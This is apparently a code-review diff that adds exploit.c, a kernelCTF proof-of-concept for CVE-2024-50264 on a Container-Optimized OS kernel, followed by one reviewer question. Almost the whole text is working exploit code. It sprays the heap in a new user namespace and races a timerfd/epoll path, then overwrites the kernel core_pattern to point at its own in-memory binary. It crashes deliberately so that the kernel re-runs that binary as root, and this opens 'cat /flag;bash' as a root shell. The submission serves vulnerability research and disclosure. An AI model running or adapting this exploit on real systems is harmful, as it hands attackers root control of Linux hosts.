pocs/linux/kernelctf/CVE-2024-50264_lts_cos/exploit/cos-109-17800.309.84/exploit.c

```diff
@@ -0,0 +1,851 @@
+{
+	int memfd = memfd_create("", 0);
+	SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
+	dup2(memfd, 666);
+	close(memfd);
+	while (check_core() == 0)
+		sleep(1);
+	puts("Root shell !!");
+	/* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */
+	*(size_t *)0 = 0;
+}
+
+void root(char *buf)
+{
+	int pid = strtoull(buf, 0, 10);
+	char path[0x100];
+	printf("run root()\n");
+	// fix stdin, stdout, stderr
+	sprintf(path, "/proc/%d/ns/net", pid);
+	int pfd = syscall(SYS_pidfd_open, pid, 0);
+	int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
+	int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
+	int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
+	dup2(stdinfd, 0);
+	dup2(stdoutfd, 1);
+	dup2(stderrfd, 2);
+	// just cat the flag
+	system("cat /flag;bash");
+}
+
+int main(int argc, void *argv[])
+{	
+
+	alarm(120);
+	if (argc > 1)
+	{
+		printf("triggered from core_pattern\n");
+		root(argv[1]);
+		exit(0);
+	}
+
+	// PHYS_LO_32 = strtoll(argv[1], NULL, 0);
+	struct rlimit rlim = {
+		.rlim_cur = 4096,
+		.rlim_max = 4096};
+	setrlimit(RLIMIT_NOFILE, &rlim);
+	
+	targetstr = (char *)mmap(0x12340000, 0x100, PROT_READ | PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
+	strcpy(targetstr, "|/proc/%P/fd/666 %P");
+
+	memset(shellcode, 0x90, 0x100);
+	memcpy(shellcode + 0x100, overwrite_core_pattern_shellcode, 0x100);
+	
+	shared_mutex = mmap(NULL, sizeof(int), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
+	*shared_mutex = 0;
+	race_shared_mutex = mmap(NULL, sizeof(int), PROT_READ|PROT_WRITE, MAP_SHARED|MAP_ANONYMOUS, -1, 0);
+	sc();
+
+	tfd = timerfd_create(CLOCK_MONOTONIC, 0);
+	do_epoll_enqueue(tfd);
+	srand(time(NULL));
+	memset(&payload, '?', sizeof(payload));
+
+	trigger_stack = mmap(NULL, 0x8000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
+	FAIL_IF(trigger_stack == MAP_FAILED);
+	trigger_stack += 0x8000;
+	heap_spray_stack = mmap(NULL, 0x8000, PROT_READ | PROT_WRITE, MAP_ANON | MAP_PRIVATE, -1, 0);
+	FAIL_IF(heap_spray_stack == MAP_FAILED);
+	heap_spray_stack += 0x8000;
+
+	do {
+		int spray_worker_pid = clone(heap_spraying, heap_spray_stack, CLONE_NEWUSER | CLONE_NEWNET | CLONE_VM | SIGCHLD, NULL);
+		FAIL_IF(spray_worker_pid < 0);
+		FAIL_IF(waitpid(spray_worker_pid, NULL, 0) < 0);
+	} while (status_spray == SPRAY_RETRY);
+
+	*shared_mutex = 1;
+
+	// system("cat /proc/sys/kernel/modprobe");
+	while(true)
+	{
+		if(check_core())
+		{
+			printf("core pattern changed!\n");
+			char buf[0x100] = {};
+    		int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+    		read(core, buf, sizeof(buf));
+			write(1, buf, sizeof(buf));
+			if(!fork())
+			{
+				int memfd = memfd_create("x", 0);
+				SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0,
+								0xffffffff));
+				dup2(memfd, 666);
+				close(memfd);
+				// trigger crash
+				*(size_t *)0 = 0;
+			}
+			break;
+		}
+		sleep(1);
+	}
+
+	while(true)
+		sleep(100);
```

Comment:
Please comment here what you are waiting for, would the kernel crash if you would not wait?